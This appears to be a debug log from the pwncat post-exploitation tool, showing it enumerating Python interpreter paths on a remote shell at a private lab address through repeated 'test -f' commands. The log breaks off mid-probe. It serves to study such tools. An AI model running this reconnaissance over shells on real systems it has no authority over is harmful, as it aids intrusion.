2020-06-12 17:05:30,789 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,789 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.6
2020-06-12 17:05:30,789 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,789 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.6 && echo /usr/local/python2/bin/python3.6 || echo;\n'
2020-06-12 17:05:30,789 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,862 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,862 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.7
2020-06-12 17:05:30,863 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,863 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.7 && echo /usr/local/python2/bin/python3.7 || echo;\n'
2020-06-12 17:05:30,863 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,887 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,887 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.8
2020-06-12 17:05:30,887 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,887 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.8 && echo /usr/local/python2/bin/python3.8 || echo;\n'
2020-06-12 17:05:30,887 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,911 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,911 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python
2020-06-12 17:05:30,911 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,911 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python && echo /usr/local/python2.7/bin/python || echo;\n'
2020-06-12 17:05:30,911 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,934 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,934 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2
2020-06-12 17:05:30,935 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,935 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2 && echo /usr/local/python2.7/bin/python2 || echo;\n'
2020-06-12 17:05:30,935 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,966 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,967 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2.7
2020-06-12 17:05:30,967 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,967 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2.7 && echo /usr/local/python2.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,967 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,993 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,993 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3
2020-06-12 17:05:30,993 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,993 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3 && echo /usr/local/python2.7/bin/python3 || echo;\n'
2020-06-12 17:05:30,993 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,178 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,178 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.5
2020-06-12 17:05:31,179 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,179 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.5 && echo /usr/local/python2.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:31,179 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,202 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,203 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.6
2020-06-12 17:05:31,203 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,203 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.6 && echo /usr/local/python2.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:31,204 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,270 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,270 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.7
2020-06-12 17:05:31,270 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,270 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.7 && echo /usr/local/python2.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:31,270 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,403 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,403 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.8
2020-06-12 17:05:31,404 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,404 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.8 && echo /usr/local/python2.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:31,404 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,473 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,473 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python
2020-06-12 17:05:31,473 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,473 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python && echo /usr/local/python3/bin/python || echo;\n'
2020-06-12 17:05:31,473 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,499 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,499 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2
2020-06-12 17:05:31,499 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,499 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2 && echo /usr/local/python3/bin/python2 || echo;\n'
2020-06-12 17:05:31,499 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,525 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,526 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2.7
2020-06-12 17:05:31,526 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,526 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2.7 && echo /usr/local/python3/bin/python2.7 || echo;\n'
2020-06-12 17:05:31,526 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,567 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,567 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3
2020-06-12 17:05:31,567 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,567 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3 && echo /usr/local/python3/bin/python3 || echo;\n'
2020-06-12 17:05:31,567 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,592 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,592 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.5
2020-06-12 17:05:31,592 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,592 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.5 && echo /usr/local/python3/bin/python3.5 || echo;\n'
2020-06-12 17:05:31,592 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,616 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,616 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.6
2020-06-12 17:05:31,616 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,616 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.6 && echo /usr/local/python3/bin/python3.6 || echo;\n'
2020-06-12 17:05:31,616 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,792 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,793 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.7
2020-06-12 17:05:31,793 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,793 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.7 && echo /usr/local/python3/bin/python3.7 || echo;\n'
2020-06-12 17:05:31,794 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,818 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,818 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.8
2020-06-12 17:05:31,819 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,819 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.8 && echo /usr/local/python3/bin/python3.8 || echo;\n'
2020-06-12 17:05:31,819 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:31,884 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:31,884 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python
2020-06-12 17:05:31,884 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:31,884 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python && echo /usr/local/python3.5/bin/python || echo;\n'
2020-06-12 17:05:31,884 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,002 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,002 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2
2020-06-12 17:05:32,002 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,002 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2 && echo /usr/local/python3.5/bin/python2 || echo;\n'
2020-06-12 17:05:32,002 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,089 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,089 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2.7
2020-06-12 17:05:32,090 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,090 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2.7 && echo /usr/local/python3.5/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,090 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,129 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,129 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3
2020-06-12 17:05:32,129 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,129 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3 && echo /usr/local/python3.5/bin/python3 || echo;\n'
2020-06-12 17:05:32,130 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,155 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,156 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.5
2020-06-12 17:05:32,156 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,156 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.5 && echo /usr/local/python3.5/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,156 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,185 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,185 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.6
2020-06-12 17:05:32,185 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,185 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.6 && echo /usr/local/python3.5/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,185 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,234 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,234 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.7
2020-06-12 17:05:32,234 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,234 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.7 && echo /usr/local/python3.5/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,234 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,407 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,407 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.8
2020-06-12 17:05:32,408 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,408 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.8 && echo /usr/local/python3.5/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,408 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,432 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,432 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python
2020-06-12 17:05:32,432 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,432 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python && echo /usr/local/python3.6/bin/python || echo;\n'
2020-06-12 17:05:32,432 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,468 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,468 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2
2020-06-12 17:05:32,468 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,468 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2 && echo /usr/local/python3.6/bin/python2 || echo;\n'
2020-06-12 17:05:32,468 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,501 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,501 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2.7
2020-06-12 17:05:32,501 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,501 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2.7 && echo /usr/local/python3.6/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,501 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,641 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,642 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3
2020-06-12 17:05:32,642 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,642 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3 && echo /usr/local/python3.6/bin/python3 || echo;\n'
2020-06-12 17:05:32,643 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,665 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,665 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.5
2020-06-12 17:05:32,665 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,665 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.5 && echo /usr/local/python3.6/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,666 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,689 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,689 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.6
2020-06-12 17:05:32,689 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,689 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.6 && echo /usr/local/python3.6/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,689 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,712 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,712 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.7
2020-06-12 17:05:32,713 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,713 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.7 && echo /usr/local/python3.6/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,713 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,738 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,738 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.8
2020-06-12 17:05:32,738 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,738 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.8 && echo /usr/local/python3.6/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,738 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,763 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,763 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python
2020-06-12 17:05:32,764 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,764 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python && echo /usr/local/python3.7/bin/python || echo;\n'
2020-06-12 17:05:32,764 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,795 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,796 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2
2020-06-12 17:05:32,796 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,796 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2 && echo /usr/local/python3.7/bin/python2 || echo;\n'
2020-06-12 17:05:32,796 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,820 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,820 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python2.7
2020-06-12 17:05:32,820 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,820 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python2.7 && echo /usr/local/python3.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:32,820 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,845 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,845 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3
2020-06-12 17:05:32,845 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,845 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3 && echo /usr/local/python3.7/bin/python3 || echo;\n'
2020-06-12 17:05:32,845 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,869 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,869 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.5
2020-06-12 17:05:32,869 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,869 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.5 && echo /usr/local/python3.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:32,869 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,893 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,893 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.6
2020-06-12 17:05:32,893 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,893 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.6 && echo /usr/local/python3.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:32,893 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,917 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,917 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.7
2020-06-12 17:05:32,917 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,917 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.7 && echo /usr/local/python3.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:32,917 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,941 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,941 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.7/bin/python3.8
2020-06-12 17:05:32,941 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.182.191:45802
2020-06-12 17:05:32,941 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.7/bin/python3.8 && echo /usr/local/python3.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:32,941 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:32,966 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:32,967 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.8/bin/python
2020-06-12 17:05:32,967 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
